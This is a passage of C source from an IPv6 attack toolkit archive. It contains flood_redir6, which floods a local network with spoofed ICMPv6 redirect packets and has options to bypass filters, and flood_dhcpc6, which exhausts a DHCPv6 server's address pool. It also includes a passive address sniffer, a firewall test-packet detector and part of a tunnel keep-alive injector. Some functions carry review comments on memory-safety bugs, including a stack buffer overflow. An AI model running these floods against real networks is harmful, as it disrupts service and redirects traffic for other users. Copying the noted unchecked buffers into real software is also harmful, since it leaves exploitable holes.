{ fprintf(stderr, "Couldn't generate IPv6 packet!\n"); exit(1); } printf("Sending..."); fflush(stdout); while (1) thc_send_pkt(dev, pkt, &pkt_len); return 0; } #endifthc-ipv6-2.5/flood_redir6.c0000644000000000000000000001161512251022437014242 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-HFD] interface [target] [oldrouter [newrouter]]\n\n", prg); printf("Flood the local network with ICMPv6 redirect packets.\n"); printf("-F/-D/-H add fragment/destination/hopbyhop header to bypass simple filters\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface, mac[6] = "", newroutermac[6]; unsigned char *mac6 = mac; unsigned char buf[1460], buf2[6], buf3[1504]; unsigned char *dst = thc_resolve6("ff02::1"), *fake_src = NULL, *fake_dst = NULL, *dstmac = NULL, *oldrouter = NULL, *newrouter = NULL; int i, j, k, type = NXT_ICMP6, offset = 14, rand_newrouter = 1; unsigned char *pkt = NULL, *pkt2 = NULL; int pkt_len = 0, pkt_len2 = 0, rawmode = 0, count = 0, do_hop = 0, do_frag = 0, do_dst = 0; int until = 0; thc_ipv6_hdr *hdr = NULL, *hdr2 = NULL; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "DFH")) >= 0) { switch (i) { case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 1) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[optind]; if (argc - optind > 1) { dst = thc_resolve6(argv[optind + 1]); fake_src = dst; } else fake_src = thc_resolve6("fe80::"); dstmac = thc_get_multicast_mac(dst); if (argc - optind > 2) { oldrouter = thc_resolve6(argv[optind + 2]); if ((mac6 = thc_get_mac(interface, NULL, dst)) == NULL) mac6 = 
thc_get_own_mac(interface); } else { oldrouter = thc_get_own_ipv6(interface, dst, PREFER_LINK); mac6 = thc_get_own_mac(interface); } if (mac6 == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc - optind > 3) { newrouter = thc_resolve6(argv[optind + 2]); rand_newrouter = 0; } else newrouter = thc_resolve6("fe80::2"); fake_dst = thc_resolve6("2004::1"); memset(newroutermac, 0, 6); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len2, fake_src, fake_dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt2, &pkt_len2, ICMP6_PING, 0, 0, NULL, 0, 0) < 0) return -1; thc_generate_pkt(interface, mac6, dstmac, pkt2, &pkt_len2); hdr = (thc_ipv6_hdr *) pkt2; k = rand(); newroutermac[1] = 2; memcpy(newroutermac + 2, (char*) &k + _TAKE4, 4); k++; if (do_hdr_size) offset = do_hdr_size; memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); memset(buf, 0, sizeof(buf)); j = 0; buf[j++] = 0; // etc. memcpy(buf, newrouter, 16); memcpy(buf + 16, fake_dst, 16); buf[32] = 2; buf[33] = 1; memcpy(buf + 34, newroutermac, 6); buf[40] = 4; buf[41] = (hdr->pkt_len - offset + 8) / 8; memcpy(buf + 48, hdr->pkt + offset, (buf[41] - 1) * 8); j = 40 + buf[41] * 8; printf("Starting to flood with ICMPv6 redirects on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (until != 1) { if (rand_newrouter) memcpy(buf + 8, (char*)&k + _TAKE4, 4); // new router memcpy(buf + 16 + 2, (char*)&k + _TAKE4, 4); // orig dst memcpy(buf + 34 + 2, (char*) &k + _TAKE4, 4); // new router mac k++; count++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, oldrouter, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0) return -1; } if (do_frag) { if (type == NXT_ICMP6) type = NXT_FRAG; for (i = 0; i < do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, count + i) < 0) return -1; } if (do_dst) { if 
(type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_REDIR, 0, 0, buf, j, 0) < 0) return -1; if (do_dst) { thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len); hdr2 = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, oldrouter, dst, type, hdr2->pkt + 40 + offset, hdr2->pkt_len - 40 - offset, 1240); } else { if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { printf("!"); } } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); if (until > 1) until--; } return 0; } thc-ipv6-2.5/passive_discovery6.c0000644000000000000000000001224612251022440015506 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #define MAX_ENTRIES 65536 int maxhop = 255, dcnt = 0, do_dst = 0, noverb = 0; unsigned char d[MAX_ENTRIES + 1][16], hostpart[8]; char *interface, *script = NULL, exec[256], *replace = NULL, *ll; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-Ds] [-m maxhop] [-R prefix] interface [script]\n\n", prg); printf("Options:\n"); printf(" -D do also dump destination addresses (does not work with -m)\n"); printf(" -s do only print the addresses, no other output\n"); printf(" -m maxhop the maximum number of hops a target which is dumped may be away.\n"); printf(" 0 means local only, the maximum amount to make sense is usually 5\n"); printf(" -R prefix exchange the defined prefix with the link local prefix\n"); printf("\nPassivly sniffs the network and dump all client's IPv6 addresses detected.\n"); printf("Note that in a switched environment you get better results when additionally\nstarting parasite6, however this will impact the network.\n"); printf("If a script name is specified after the interface, it is called with the\ndetected ipv6 address as first and the interface as second 
option.\n");
  exit(-1);
}

/*
 * pcap callback of passive_discovery6: prints every IPv6 address that is seen
 * for the first time and, if a script was given, runs it for that address.
 *
 * foo    - not used by this function
 * header - pcap header; only caplen is read
 * data   - captured frame; written to when the -R prefix replacement applies
 *
 * NOTE(review): ptr is a plain `char *`. Where plain char is signed, bytes
 * >= 0x80 read as negative values, so `ptr[offset] != 0xff` is always true
 * and `ptr[7] == 255` is never true; the hop-limit range tests are affected
 * the same way. Reading through `unsigned char *` would make the comparisons
 * behave as written - confirm on the target platform.
 * NOTE(review): apart from `len >= 64` in the DAD branch, len is never
 * checked before ptr[6], ptr[7], ptr[40] and the 16 bytes at ptr + offset are
 * read, so a short capture is read past its end.
 */
void detect(u_char *foo, const struct pcap_pkthdr *header, unsigned char *data) {
  char *ptr = data, *ptr2;
  int i, j, k, offset = 8, doit, len = header->caplen;

  // skip the link-layer header: do_hdr_size bytes when set, otherwise 14
  if (do_hdr_size) {
    len -= do_hdr_size;
    ptr += do_hdr_size;
    // NOTE(review): dumps 8 bytes of every packet; looks like leftover debugging - confirm
    thc_dump_data(ptr, 8, "packet");
    if ((ptr[0] & 240) != 0x60)
      return;
  } else {
    len -= 14;
    ptr += 14;
  }

  // drop ff00::/8 and ::/128
  // k == 0 looks at the address at offset 8 (source); with -D a second pass
  // looks at the next 16 bytes (destination)
  for (k = 0; k <= do_dst; k++) {
    doit = 0;
    // accept when the hop limit (ptr[7]) is within maxhop of 255, 128 or 64
    if (ptr[offset] != 0xff &&
        ( maxhop > 254 || ptr[7] >= 255 - maxhop ||
          (ptr[7] >= 128 - maxhop && ptr[7] <= 128) ||
          (ptr[7] >= 64 - maxhop && ptr[7] <= 64) ) )
      doit = 1;

    // d[dcnt + 1] is a slot main() zeroed and nothing has filled yet, so this
    // matches the unspecified source address "::".
    // NOTE(review): d has MAX_ENTRIES + 1 rows and dcnt can reach
    // MAX_ENTRIES + 1, so d[dcnt + 1] is read out of bounds once the table is
    // full; a dedicated all-zero buffer would avoid that.
    if (memcmp(ptr + 8, d[dcnt + 1], 16) == 0) {
      if (k == 0 && ptr[7] == 255 && ptr[6] == NXT_ICMP6 && ptr[40] == ICMP6_NEIGHBORSOL && len >= 64) {
        doit = 1;               // DAD packet
        offset = 48;            // report the solicited target instead of "::"
      } else
        doit = 0;
    }

    // is it our own address?
    if (memcmp(ptr + offset + 8, hostpart, 8) == 0)
      doit = 0;

    if (doit) {
      // replace prefix with link-local if -R
      if (replace != NULL)
        if (memcmp(ptr + offset, replace, 8) == 0)
          memcpy(ptr + offset, ll, 8);

      // check for doubles (linear scan over everything recorded so far)
      j = 0;
      if (dcnt > 0)
        for (i = 0; i < dcnt && j == 0; i++)
          if (memcmp(ptr + offset, d[i], 16) == 0)
            j = 1;

      if (j == 0) {             // no double
        ptr2 = thc_ipv62notation((char *) (ptr + offset));
        printf("%s%s\n", noverb == 0 ? "Detected: " : "", ptr2);
        if (dcnt < MAX_ENTRIES) {       // add to double list
          memcpy(d[dcnt], ptr + offset, 16);
          dcnt++;
        } else if (dcnt == MAX_ENTRIES) {       // table full? should not happen, smells like attack
          // bump dcnt once more so this warning is printed only one time
          dcnt++;
          fprintf(stderr, "Warning: Table for detected IPv6 addresses is full, doubles can occur now!\n");
        }
        // One child process per newly seen address: the fork rate is set by
        // whoever is sending traffic on the link, not by the operator.
        // NOTE(review): wait3() runs inside the child (the fork() == 0 branch),
        // which has no children of its own; the parent never reaps here, so
        // exited children presumably stay as zombies - confirm.
        // NOTE(review): the command line is built by concatenation and handed
        // to system(); script and interface come from argv, ptr2 from
        // thc_ipv62notation() - presumably only hex digits and colons, verify.
        if (script != NULL && fork() == 0) {    // beware, this can DOS you
          (void) wait3(NULL, WNOHANG, NULL);
          snprintf(exec, sizeof(exec), "%s %s %s\n", script, ptr2, interface);
          if (system(exec) < 0)
            fprintf(stderr, "Error: Executing failed - %s\n", exec);
          exit(0);
        }
        free(ptr2);
      }
    }
    offset += 16;
  }
}

/*
 * Entry point of passive_discovery6: parses -D, -s, -m and -R, records the
 * host's own addresses so they are not reported, then hands detect() to
 * thc_pcap_function() with the filter "ip6".
 */
int main(int argc, char *argv[]) {
  int i;
  char *glob;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  while ((i = getopt(argc, argv, "Dsm:R:")) >= 0) {
    switch (i) {
    case 'm':
      // NOTE(review): atoi() gives no error indication; non-numeric input becomes 0
      maxhop = atoi(optarg);
      break;
    case 'D':
      do_dst = 1;
      break;
    case 's':
      noverb = 1;
      break;
    case 'R':
      // cut a trailing "/len" off the prefix; ll is only scratch here and is
      // reassigned below
      if ((ll = index(optarg, '/')) != NULL)
        *ll = 0;
      replace = thc_resolve6(optarg);
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  if (argc - optind < 1 || argc - optind > 2)
    help(argv[0]);

  interface = argv[optind];
  if (argc == optind + 2)
    script = argv[optind + 1];
  memset(d, 0, sizeof(d));

  _thc_ipv6_showerrors = 0;

  // we dont want our own address in the discovered addresses
  // NOTE(review): neither result is checked before ll + 8 and glob + 8 are
  // dereferenced; other tools in this archive test thc_get_own_ipv6() against
  // NULL, so a bad interface name presumably crashes here - confirm.
  glob = thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL);
  ll = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  memcpy(hostpart, ll + 8, 8);
  if (memcmp(ll + 8, glob + 8, 8) != 0) {       // do we have a global address with a different host part?
    memcpy(d[0], glob, 16);
    dcnt = 1;
  }

  // NOTE(review): do_dst is only ever 0 or 1, so this fires whenever -D is
  // given, with or without -m; `maxhop < 255` was presumably intended.
  if (do_dst < 255 && do_dst)
    fprintf(stderr, "Warning: it does not make sense to use the -m and -D options together!\n");

  if (noverb == 0)
    printf("Started IPv6 passive system detection (Press Control-C to end) ...\n");

  return thc_pcap_function(interface, "ip6", (char *) detect, 1, NULL);

  return 0;                     // never reached
}
thc-ipv6-2.5/implementation6d.c0000644000000000000000000001200312251022437015133 0ustar rootroot/*
 * Test:
 * 1. next header = hopbyhop, but no header
 * 2.
next header = hopbyhop, but invalid length in hopbyhop header
 * 3. next header = hopbyhop + no_next, but ip6 length longer than claimed
 * 4. next header = hopbyhop + no_next, but ip6 length shorter than claimed
 * 5. 90 extension ignored headers
 * 6. 65535 byte packet (fragmented) with 3850 extension ignored headers
 * 7. jumbo packet (fragmented) with 7700 extension ignored headers
 * 8-10: same as 5-9 but final length larger than real packet
 * 11. 180 hop-by-hop headers
 * 12. forwarding header with 255 segments left (but only 1 defined)
 *
 *
 * misc:
 * - toobig6 with mtu = 600 on target
 * - alive6 with target ff02::1 and router = target
 * - alive6 with target = target and router = target (1shot frag + forward)
 * - rsmurf on target
 */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "thc-ipv6.h"

// set by -r in main(): frames then start directly with the IPv6 header
int rawmode = 0;
// last test case reported by check_packet(), used to print "(cont'd)"
int cont = 0;

/* Print usage for implementation6d and exit with status -1. */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s interface\n\n", prg);
  printf("Identifies test packets by the implementation6 tool, useful to check what\n");
  printf("packets passed a firewall\n");
// printf("Use -r to use raw mode.\n\n");
  exit(-1);
}

/*
 * pcap callback of implementation6d: matches a captured IPv6 packet against
 * fixed byte patterns and prints which implementation6 test case it appears
 * to be. It only reads the packet and updates the global `cont`.
 *
 * foo    - not used by this function
 * header - pcap header; only caplen is read
 * data   - captured frame
 *
 * NOTE(review): the length guards do not cover every index that is read.
 * ipv6hdr[0], [6] and [40] are read before any length test; the `len >= 136`
 * branch compares 20 bytes starting at offset 128 (up to offset 147); the
 * `len >= 46` branch reads offsets 47, 48, 52, 64 and 69. A short capture is
 * therefore read past its end.
 */
void check_packet(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  unsigned char *ipv6hdr;
  unsigned char buf[20];
  int add = 0, len = header->caplen;    // add is never changed in this function

  if (debug) {
    printf("DEBUG: packet received\n");
    thc_dump_data((unsigned char *) data, header->caplen, "Received Packet");
  }

  // locate the IPv6 header: after do_hdr_size bytes if set, after 14 bytes
  // otherwise, or at the very start in raw mode (len is not reduced there)
  if (rawmode == 0) {
    if (do_hdr_size) {
      ipv6hdr = (unsigned char *) (data + do_hdr_size);
      len -= do_hdr_size;
      if ((ipv6hdr[0] & 240) != 0x60)
        return;
    } else {
      ipv6hdr = (unsigned char *) (data + 14);
      len -= 14;
    }
  } else
    ipv6hdr = (unsigned char *) data;

  if (ipv6hdr[0] >> 4 != 6)
    return;                     // not an ipv6 packet

  // ignore neighbor discovery and ICMPv6 error traffic
  if (ipv6hdr[6] == NXT_ICMP6 && (ipv6hdr[40] == ICMP6_NEIGHBORSOL || ipv6hdr[40] == ICMP6_NEIGHBORADV || ipv6hdr[40] == ICMP6_PARAMPROB || ipv6hdr[40] == ICMP6_TTLEXEED))
    return;

  if (len >= 136) {
    if (ipv6hdr[6] == 0 && ipv6hdr[40] == 0 && ipv6hdr[48] == 0) {
      printf(" Detected (potential) implementation6 test case #%d %s\n", 3, cont == 3 ? "(cont'd)" : "");
      cont = 3;
      return;
    }
    // a run of 20 bytes at offset 128 that all equal the byte at offset 124
    // is reported with that byte as the test case number
    buf[0] = ipv6hdr[124];
    memset(buf + 1, buf[0], sizeof(buf) - 1);
    if (memcmp(ipv6hdr + 128, buf, sizeof(buf)) == 0) {
      printf(" Detected (potential) implementation6 test case #%d %s\n", buf[0], cont == buf[0] ? "(cont'd)" : "");
      cont = buf[0];
      return;
    }
  }

  if (len >= 46) {
    switch (ipv6hdr[6]) {
    case NXT_ICMP6:
      if (1 == 1) {             // always true
        switch (ipv6hdr[40]) {
        case ICMP6_PINGREQUEST:
          if (ipv6hdr[44] == 0x34 && ipv6hdr[45] == 0x56 && ipv6hdr[46] == 0x78 && ipv6hdr[47] == 0x90 && ipv6hdr[52] == 'A') {
            printf(" Detected (potential) implementation6 standard thc-ipv6 ping request%s\n", cont == -1 ? " (cont'd)" : "");
            cont = -1;
          }
          return;
          break;
        case ICMP6_INFOREQUEST:
          if (ipv6hdr[48] == 20 + add) {
            printf(" Detected (potential) implementation6 test case #%d\n", 20 + add);
            cont = 0;
          }
          return;
          break;
        case ICMP6_INVNEIGHBORSOL:
          printf(" Detected (potential) implementation6 test case #%d\n", 21 + add);
          cont = 0;
          return;
          break;
        case ICMP6_CERTPATHSOL:
          if (ipv6hdr[45] == 23 + add) {
            printf(" Detected (potential) implementation6 test case #%d\n", 23 + add);
            cont = 0;
          }
          return;
          break;
        default:
          break;
        }
      }
      return;
      break;
    case NXT_OPTS:
      if (ipv6hdr[64] == ICMP6_MOBILE_PREFIXSOL) {
        if (ipv6hdr[69] == 22 + add) {
          printf(" Detected (potential) implementation6 test case #%d\n", 22 + add);
          cont = 0;
        }
        return;
      }
      break;
    default:
      break;
    }
  }

  return;
}

/*
 * Entry point of implementation6d: accepts an optional leading -r (raw mode,
 * not mentioned in the usage text), then captures on the given interface
 * with the filter "ip6" and check_packet() as callback.
 */
int main(int argc, char *argv[]) {
  unsigned char string[64] = "ip6";
  char *interface;

  if (argv[1] != NULL && strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }

  if (argc != 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  interface = argv[1];

  setvbuf(stdout, NULL, _IONBF, 0);

  printf("Waiting for implementation check packets on %s, press Control-C to end.\n", interface);
  if (thc_pcap_function(interface, string, (char *) check_packet, 0,
NULL) < 0) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } // never returns return 0; } thc-ipv6-2.5/flood_dhcpc6.c0000644000000000000000000001634212251022436014217 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" char *interface = NULL, *dns_name = NULL, elapsed[6] = { 0, 8, 0, 2, 0, 0 }; int counter = 0, do_dns = 0; // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand char solicit[] = { 0x01, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x0e, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; char dnsupdate1[] = { 0, 39, 0, 8, 1, 6, 122, 97, 97, 97, 97, 97 }; char dnsupdate2[] = { 0, 6, 0, 2, 0, 39 }; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-n|-N] [-1] [-d domain-name] interface [dhcpserver]\n\n", prg); printf("DHCP client flooder. Use to deplete the IP address pool a DHCP6 server is\n"); printf("offering. Note: if the pool is very large, this is rather senseless. :-)\n\n"); printf("By default the link-local IP MAC address is random, however this won't work\n"); printf("in some circumstances. -n will use the real MAC, -N the real MAC and\n"); printf("link-local address. 
-1 will only solicate an address but not request it.\n");
  printf("If -N is not used, you should run parasite6 in parallel.\n");
  printf("Use -d to force DNS updates, you must specify a domain name.\n");
  exit(-1);
}

/*
 * pcap callback: walks the type/length/value options of a captured UDP
 * message whose first payload byte is 2, copies selected options into a
 * local buffer and sends that buffer back as a UDP payload (port 546 to 547).
 *
 * foo    - not used by this function
 * header - pcap header; only caplen is read
 * data   - captured frame; all content is attacker-controllable network input
 *
 * NOTE(review): mybuf is 1024 bytes and mlen grows by olen + 4 for every
 * copied option, but mlen is never compared with sizeof(mybuf); olen is
 * limited only by the captured length. A large enough captured message
 * overflows the stack buffer. Each memcpy() needs a check such as
 * `mlen + olen + 4 <= (int) sizeof(mybuf)` in front of it.
 * NOTE(review): smac is assigned only when an option with data[1] == 1 is
 * seen; without one it is passed to thc_generate_and_send_pkt()
 * uninitialised.
 * NOTE(review): ptr keeps pointing at the start of the frame, so ptr + 6,
 * ptr + 22 and ptr + 38 assume a 14-byte link header even when do_hdr_size
 * is set - confirm.
 */
void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  int len = header->caplen, pkt_len = 0, mlen = 10, olen;
  unsigned char *ptr = (unsigned char *) data, *pkt = NULL;
  char *smac, mac[6] = { 0, 0x0d, 0, 0x0d, 0x0d, 0x0e };
  char mybuf[1024] = { 0x03, 0, 0, 0, 0, 8, 0, 2, 0, 0 };       // first 10 bytes are fixed, options are appended at mlen

  // skip the link-layer header
  if (do_hdr_size) {
    data += do_hdr_size;
    len -= do_hdr_size;
    if ((data[0] & 240) != 0x60)
      return;
  } else {
    data += 14;
    len -= 14;
  }

  // the length test comes first, so data[6] and data[48] are only read when
  // at least 126 bytes remain
  if (len < 126 || data[6] != NXT_UDP || data[48] != 2)
    return;

  // skip the 40-byte IPv6 and 8-byte UDP headers
  data += 48;
  len -= 48;

  // copy the 3 bytes after the message type into the reply
  memcpy(mybuf + 1, data + 1, 3);
  data += 4;
  len -= 4;

  while (len >= 4) {
    // option length is big-endian in bytes 2-3; both operands are unsigned
    // char, so the `olen < 0` test cannot be true
    if ((olen = data[2] * 256 + data[3]) > len - 4 || olen < 0) {
      printf("Information: evil packet received\n");
      olen = 0;
      len = -1;
    } else {
      // only the low byte of the option code (data[1]) is examined
      if (data[1] > 1 && data[1] <= 3) {
        memcpy(mybuf + mlen, data, olen + 4);
        mlen += olen + 4;
      } else if (data[1] == 1) {
        memcpy(mybuf + mlen, data, olen + 4);
        mlen += olen + 4;
        // set smac to the client MAC carried in the packet
        if (olen == 14)
          smac = (char *) (data + 12);
        else
          smac = mac;
      } else if (data[1] == 39 && do_dns) {
        memcpy(mybuf + mlen, data, olen + 4);
        mybuf[mlen + 4] = 1;    // force server to write dns entry
        mlen += olen + 4;
      }
      data += olen + 4;
      len -= olen + 4;
      if (len < 0) {
        printf("Information: evil packet received\n");
        len = -1;
      }
    }
  }

  // len is -1 when the option list was rejected above
  if (len >= 0) {
    counter++;
    // NOTE(review): the early returns below skip thc_destroy_packet(), so pkt
    // is presumably leaked on those paths - confirm.
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ptr + 38, ptr + 22, 1, 0, 0, 0, 0)) == NULL)
      return;
    if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, mybuf, mlen) < 0)
      return;
    if (thc_generate_and_send_pkt(interface, smac, ptr + 6, pkt, &pkt_len) < 0)
      return;
    pkt = thc_destroy_packet(pkt);
    if (counter % 1000 == 0)
      printf("!");
  }
}

int main(int argc, char *argv[]) {
  char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL;
  char wdatabuf[1024];
  unsigned char
*mac6 = mac, *src, *dst; int i, s, len, pkt_len = 0, dlen = 0; unsigned long long int count = 0; pcap_t *p = NULL; int do_all = 1, use_real_mac = 0, use_real_link = 0; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); while ((i = getopt(argc, argv, "d:nNr1")) >= 0) { switch (i) { case 'N': use_real_link = 1; // no break case 'n': use_real_mac = 1; break; case '1': do_all = 0; case 'd': do_dns = 1; dns_name = optarg; case 'r': i = 0; break; // just to ignore -r default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } memset(mac, 0, sizeof(mac)); interface = argv[optind]; if (use_real_link) src = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else src = thc_resolve6("fe80::"); if (use_real_mac) mac6 = thc_get_own_mac(interface); if (argc - optind <= 1) dst = thc_resolve6("ff02::1:2"); else dst = thc_resolve6(argv[optind + 1]); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (src == NULL || mac6 == NULL) { fprintf(stderr, "Error: invalid interface %s or bad mac/IP defined\n", interface); exit(-1); } // only to prevent our system to send icmp port unreachable messages if ((s = thc_bind_udp_port(546)) < 0) fprintf(stderr, "Warning: could not bind to 546/udp\n"); if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) { fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface); exit(-1); } len = sizeof(solicit); memcpy(wdatabuf, solicit, len); if (do_dns) { memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1)); dlen = len + 8; len += sizeof(dnsupdate1); if (dns_name != NULL && strlen(dns_name) < 240) { if (dns_name[0] != '.') { wdatabuf[len] = '.'; wdatabuf[dlen - 5]++; wdatabuf[dlen - 3]++; len++; } memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1); wdatabuf[dlen - 5] += strlen(dns_name) + 1; wdatabuf[dlen - 3] += 
strlen(dns_name) + 1; len += strlen(dns_name) + 1; } memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2)); len += sizeof(dnsupdate2); } printf("Starting to flood dhcp6 servers locally on %s (Press Control-C to end) ...\n\n", interface); while (1) { count++; if (!use_real_link) memcpy(src + 8, (char *) &count, 8); // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 32] = rand() % 256; wdatabuf[i + 18] = rand() % 256; mac[i + 2] = rand() % 256; if (do_dns) wdatabuf[i + dlen] = 'a' + rand() % 26; } if (!use_real_mac) memcpy(wdatabuf + 22, mac, 6); memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) return -1; // we have to tone it down, otherwise we will not get advertisements if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) printf("!"); pkt = thc_destroy_packet(pkt); if (do_all) { usleep(75); while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); } if (count % 1000 == 0) printf("."); } return 0; // never reached } thc-ipv6-2.5/inject_alive6.c0000644000000000000000000001422412251022437014405 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" extern int thc_socket; extern char *do_hdr; extern int do_hdr_off; int type = 0, passive = 0, active = 0; char *interface; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-ap] interface\n\n", prg); printf("This tool answers to keep-alive requests on PPPoE and 6in4 tunnels; for PPPoE\nit also sends keep-alive requests.\n"); printf("Note that the appropriate environment variable THC_IPV6_{PPPOE|6IN4} must be set\n"); printf("Option -a will actively send alive requests every 15 seconds.\n"); printf("Option -p will not send replies to 
alive requests.\n"); exit(-1); } void intercept(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ipv6hdr, *pkt, buf[1500]; int len = header->caplen, pkt_len = 0; unsigned int *seq, offset = 0; unsigned short int *orig, *seen; thc_ipv6_hdr hdr; if (debug) { printf("DEBUG: packet received\n"); thc_dump_data((unsigned char *)data, len, "Received packet on tunnel"); } if (type == 2) { // 6in4 len -= do_hdr_size; ipv6hdr = (unsigned char*) (data + do_hdr_size); if ((ipv6hdr[0] & 240) != 0x60) return; if (len < 48 || ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[41] != 0) return; seq = (unsigned int *) (ipv6hdr + 44); if (ipv6hdr[40] == ICMP6_PINGREQUEST) { printf("Keep-alive ping request ID 0x%x seen\n", htonl(*seq)); if (passive == 0) { if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, ipv6hdr + 24, ipv6hdr + 8, 255, 0, 0, 0, 0)) == NULL) return; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREPLY, 0, htonl(*seq), (unsigned char *) ipv6hdr + 40 + 8, len - 40 - 8, 0) < 0) return; if (thc_generate_and_send_pkt(interface, NULL, NULL, pkt, &pkt_len) < 0) return; pkt = thc_destroy_packet(pkt); printf("Keep-alive ping reply ID 0x%x sent\n", htonl(*seq)); } } if (passive && ipv6hdr[40] == ICMP6_PINGREPLY) printf("Keep-alive ping reply ID 0x%x seen\n", htonl(*seq)); } else { // PPPoE seen = (unsigned short int *) (data + 20 + offset + do_hdr_off); if (len < 40 || len > 1500 || htons(*seen) != 0xc021) return; seen = (unsigned short int *) (data + 16 + offset + do_hdr_off); if (memcmp(data + 16 + offset + do_hdr_off, do_hdr + 16 + offset + do_hdr_off, 2) != 0) { orig = (unsigned short int*) (do_hdr + 16 + offset + do_hdr_off); fprintf(stderr, "Warning: PPPoE SessionID is different to that defined in the environment variable! 
